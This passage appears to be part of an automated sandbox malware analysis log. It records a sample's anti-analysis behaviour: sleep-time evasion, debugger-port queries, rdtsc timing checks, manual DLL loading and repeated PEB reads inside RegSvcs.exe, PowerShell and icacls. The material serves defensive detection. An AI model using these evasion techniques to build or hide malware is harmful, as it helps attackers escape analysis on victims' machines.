Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe TID: 7900	Thread sleep count: 43 > 30
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe TID: 7900	Thread sleep time: -64500s >= -30000s
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe TID: 7900	Thread sleep count: 43 > 30
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe TID: 7900	Thread sleep time: -43000s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\icacls.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\icacls.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\icacls.exe

Code function: 13_2_0270CB30 FindFirstFileW,FindNextFileW,FindClose,

13_2_0270CB30

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: qLmzoTzSrlQuBN.exe, 00000013.00000002.4127666408.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: icacls.exe, 0000000D.00000002.4127000358.00000000028B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: firefox.exe, 00000014.00000002.2190065874.00000230E5BFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_017F096E rdtsc

8_2_017F096E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_00417C83 LdrLoadDll,

8_2_00417C83

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01854180 mov eax, dword ptr fs:[00000030h]	8_2_01854180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01854180 mov eax, dword ptr fs:[00000030h]	8_2_01854180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0186C188 mov eax, dword ptr fs:[00000030h]	8_2_0186C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0186C188 mov eax, dword ptr fs:[00000030h]	8_2_0186C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183019F mov eax, dword ptr fs:[00000030h]	8_2_0183019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183019F mov eax, dword ptr fs:[00000030h]	8_2_0183019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183019F mov eax, dword ptr fs:[00000030h]	8_2_0183019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183019F mov eax, dword ptr fs:[00000030h]	8_2_0183019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AC156 mov eax, dword ptr fs:[00000030h]	8_2_017AC156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B6154 mov eax, dword ptr fs:[00000030h]	8_2_017B6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B6154 mov eax, dword ptr fs:[00000030h]	8_2_017B6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018761C3 mov eax, dword ptr fs:[00000030h]	8_2_018761C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018761C3 mov eax, dword ptr fs:[00000030h]	8_2_018761C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182E1D0 mov eax, dword ptr fs:[00000030h]	8_2_0182E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182E1D0 mov eax, dword ptr fs:[00000030h]	8_2_0182E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182E1D0 mov ecx, dword ptr fs:[00000030h]	8_2_0182E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182E1D0 mov eax, dword ptr fs:[00000030h]	8_2_0182E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0182E1D0 mov eax, dword ptr fs:[00000030h]	8_2_0182E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E0124 mov eax, dword ptr fs:[00000030h]	8_2_017E0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018861E5 mov eax, dword ptr fs:[00000030h]	8_2_018861E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E01F8 mov eax, dword ptr fs:[00000030h]	8_2_017E01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185E10E mov eax, dword ptr fs:[00000030h]	8_2_0185E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185E10E mov ecx, dword ptr fs:[00000030h]	8_2_0185E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185E10E mov eax, dword ptr fs:[00000030h]	8_2_0185E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185E10E mov eax, dword ptr fs:[00000030h]	8_2_0185E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185E10E mov ecx, dword ptr fs:[00000030h]	8_2_0185E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185E10E mov eax, dword ptr fs:[00000030h]	8_2_0185E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185E10E mov eax, dword ptr fs:[00000030h]	8_2_0185E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185E10E mov ecx, dword ptr fs:[00000030h]	8_2_0185E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185E10E mov eax, dword ptr fs:[00000030h]	8_2_0185E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185E10E mov ecx, dword ptr fs:[00000030h]	8_2_0185E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01870115 mov eax, dword ptr fs:[00000030h]	8_2_01870115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185A118 mov ecx, dword ptr fs:[00000030h]	8_2_0185A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185A118 mov eax, dword ptr fs:[00000030h]	8_2_0185A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185A118 mov eax, dword ptr fs:[00000030h]	8_2_0185A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185A118 mov eax, dword ptr fs:[00000030h]	8_2_0185A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01844144 mov eax, dword ptr fs:[00000030h]	8_2_01844144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01844144 mov eax, dword ptr fs:[00000030h]	8_2_01844144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01844144 mov ecx, dword ptr fs:[00000030h]	8_2_01844144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01844144 mov eax, dword ptr fs:[00000030h]	8_2_01844144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01844144 mov eax, dword ptr fs:[00000030h]	8_2_01844144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01848158 mov eax, dword ptr fs:[00000030h]	8_2_01848158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01884164 mov eax, dword ptr fs:[00000030h]	8_2_01884164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01884164 mov eax, dword ptr fs:[00000030h]	8_2_01884164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AA197 mov eax, dword ptr fs:[00000030h]	8_2_017AA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AA197 mov eax, dword ptr fs:[00000030h]	8_2_017AA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AA197 mov eax, dword ptr fs:[00000030h]	8_2_017AA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F0185 mov eax, dword ptr fs:[00000030h]	8_2_017F0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017DC073 mov eax, dword ptr fs:[00000030h]	8_2_017DC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B2050 mov eax, dword ptr fs:[00000030h]	8_2_017B2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018480A8 mov eax, dword ptr fs:[00000030h]	8_2_018480A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018760B8 mov eax, dword ptr fs:[00000030h]	8_2_018760B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018760B8 mov ecx, dword ptr fs:[00000030h]	8_2_018760B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AA020 mov eax, dword ptr fs:[00000030h]	8_2_017AA020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AC020 mov eax, dword ptr fs:[00000030h]	8_2_017AC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018320DE mov eax, dword ptr fs:[00000030h]	8_2_018320DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018360E0 mov eax, dword ptr fs:[00000030h]	8_2_018360E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017CE016 mov eax, dword ptr fs:[00000030h]	8_2_017CE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017CE016 mov eax, dword ptr fs:[00000030h]	8_2_017CE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017CE016 mov eax, dword ptr fs:[00000030h]	8_2_017CE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017CE016 mov eax, dword ptr fs:[00000030h]	8_2_017CE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01834000 mov ecx, dword ptr fs:[00000030h]	8_2_01834000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01852000 mov eax, dword ptr fs:[00000030h]	8_2_01852000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01852000 mov eax, dword ptr fs:[00000030h]	8_2_01852000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01852000 mov eax, dword ptr fs:[00000030h]	8_2_01852000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01852000 mov eax, dword ptr fs:[00000030h]	8_2_01852000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01852000 mov eax, dword ptr fs:[00000030h]	8_2_01852000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01852000 mov eax, dword ptr fs:[00000030h]	8_2_01852000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01852000 mov eax, dword ptr fs:[00000030h]	8_2_01852000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01852000 mov eax, dword ptr fs:[00000030h]	8_2_01852000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AC0F0 mov eax, dword ptr fs:[00000030h]	8_2_017AC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F20F0 mov ecx, dword ptr fs:[00000030h]	8_2_017F20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B80E9 mov eax, dword ptr fs:[00000030h]	8_2_017B80E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AA0E3 mov ecx, dword ptr fs:[00000030h]	8_2_017AA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01846030 mov eax, dword ptr fs:[00000030h]	8_2_01846030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01836050 mov eax, dword ptr fs:[00000030h]	8_2_01836050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017A80A0 mov eax, dword ptr fs:[00000030h]	8_2_017A80A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B208A mov eax, dword ptr fs:[00000030h]	8_2_017B208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018363C0 mov eax, dword ptr fs:[00000030h]	8_2_018363C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0186C3CD mov eax, dword ptr fs:[00000030h]	8_2_0186C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018543D4 mov eax, dword ptr fs:[00000030h]	8_2_018543D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018543D4 mov eax, dword ptr fs:[00000030h]	8_2_018543D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185E3DB mov eax, dword ptr fs:[00000030h]	8_2_0185E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185E3DB mov eax, dword ptr fs:[00000030h]	8_2_0185E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185E3DB mov ecx, dword ptr fs:[00000030h]	8_2_0185E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185E3DB mov eax, dword ptr fs:[00000030h]	8_2_0185E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AC310 mov ecx, dword ptr fs:[00000030h]	8_2_017AC310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D0310 mov ecx, dword ptr fs:[00000030h]	8_2_017D0310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EA30B mov eax, dword ptr fs:[00000030h]	8_2_017EA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EA30B mov eax, dword ptr fs:[00000030h]	8_2_017EA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017EA30B mov eax, dword ptr fs:[00000030h]	8_2_017EA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017E63FF mov eax, dword ptr fs:[00000030h]	8_2_017E63FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017CE3F0 mov eax, dword ptr fs:[00000030h]	8_2_017CE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017CE3F0 mov eax, dword ptr fs:[00000030h]	8_2_017CE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017CE3F0 mov eax, dword ptr fs:[00000030h]	8_2_017CE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C03E9 mov eax, dword ptr fs:[00000030h]	8_2_017C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C03E9 mov eax, dword ptr fs:[00000030h]	8_2_017C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C03E9 mov eax, dword ptr fs:[00000030h]	8_2_017C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C03E9 mov eax, dword ptr fs:[00000030h]	8_2_017C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C03E9 mov eax, dword ptr fs:[00000030h]	8_2_017C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C03E9 mov eax, dword ptr fs:[00000030h]	8_2_017C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C03E9 mov eax, dword ptr fs:[00000030h]	8_2_017C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017C03E9 mov eax, dword ptr fs:[00000030h]	8_2_017C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01888324 mov eax, dword ptr fs:[00000030h]	8_2_01888324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01888324 mov ecx, dword ptr fs:[00000030h]	8_2_01888324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01888324 mov eax, dword ptr fs:[00000030h]	8_2_01888324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01888324 mov eax, dword ptr fs:[00000030h]	8_2_01888324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BA3C0 mov eax, dword ptr fs:[00000030h]	8_2_017BA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BA3C0 mov eax, dword ptr fs:[00000030h]	8_2_017BA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BA3C0 mov eax, dword ptr fs:[00000030h]	8_2_017BA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BA3C0 mov eax, dword ptr fs:[00000030h]	8_2_017BA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BA3C0 mov eax, dword ptr fs:[00000030h]	8_2_017BA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017BA3C0 mov eax, dword ptr fs:[00000030h]	8_2_017BA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B83C0 mov eax, dword ptr fs:[00000030h]	8_2_017B83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B83C0 mov eax, dword ptr fs:[00000030h]	8_2_017B83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B83C0 mov eax, dword ptr fs:[00000030h]	8_2_017B83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B83C0 mov eax, dword ptr fs:[00000030h]	8_2_017B83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0188634F mov eax, dword ptr fs:[00000030h]	8_2_0188634F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01832349 mov eax, dword ptr fs:[00000030h]	8_2_01832349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01832349 mov eax, dword ptr fs:[00000030h]	8_2_01832349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01832349 mov eax, dword ptr fs:[00000030h]	8_2_01832349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01832349 mov eax, dword ptr fs:[00000030h]	8_2_01832349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01832349 mov eax, dword ptr fs:[00000030h]	8_2_01832349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01832349 mov eax, dword ptr fs:[00000030h]	8_2_01832349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01832349 mov eax, dword ptr fs:[00000030h]	8_2_01832349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01832349 mov eax, dword ptr fs:[00000030h]	8_2_01832349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01832349 mov eax, dword ptr fs:[00000030h]	8_2_01832349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01832349 mov eax, dword ptr fs:[00000030h]	8_2_01832349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01832349 mov eax, dword ptr fs:[00000030h]	8_2_01832349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01832349 mov eax, dword ptr fs:[00000030h]	8_2_01832349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01832349 mov eax, dword ptr fs:[00000030h]	8_2_01832349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01832349 mov eax, dword ptr fs:[00000030h]	8_2_01832349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01832349 mov eax, dword ptr fs:[00000030h]	8_2_01832349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0187A352 mov eax, dword ptr fs:[00000030h]	8_2_0187A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01858350 mov ecx, dword ptr fs:[00000030h]	8_2_01858350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183035C mov eax, dword ptr fs:[00000030h]	8_2_0183035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183035C mov eax, dword ptr fs:[00000030h]	8_2_0183035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183035C mov eax, dword ptr fs:[00000030h]	8_2_0183035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183035C mov ecx, dword ptr fs:[00000030h]	8_2_0183035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183035C mov eax, dword ptr fs:[00000030h]	8_2_0183035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0183035C mov eax, dword ptr fs:[00000030h]	8_2_0183035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017A8397 mov eax, dword ptr fs:[00000030h]	8_2_017A8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017A8397 mov eax, dword ptr fs:[00000030h]	8_2_017A8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017A8397 mov eax, dword ptr fs:[00000030h]	8_2_017A8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AE388 mov eax, dword ptr fs:[00000030h]	8_2_017AE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AE388 mov eax, dword ptr fs:[00000030h]	8_2_017AE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017AE388 mov eax, dword ptr fs:[00000030h]	8_2_017AE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D438F mov eax, dword ptr fs:[00000030h]	8_2_017D438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017D438F mov eax, dword ptr fs:[00000030h]	8_2_017D438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0185437C mov eax, dword ptr fs:[00000030h]	8_2_0185437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01830283 mov eax, dword ptr fs:[00000030h]	8_2_01830283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01830283 mov eax, dword ptr fs:[00000030h]	8_2_01830283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01830283 mov eax, dword ptr fs:[00000030h]	8_2_01830283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017A826B mov eax, dword ptr fs:[00000030h]	8_2_017A826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B4260 mov eax, dword ptr fs:[00000030h]	8_2_017B4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017B4260 mov eax, dword ptr fs:[00000030h]	8_2_017B4260
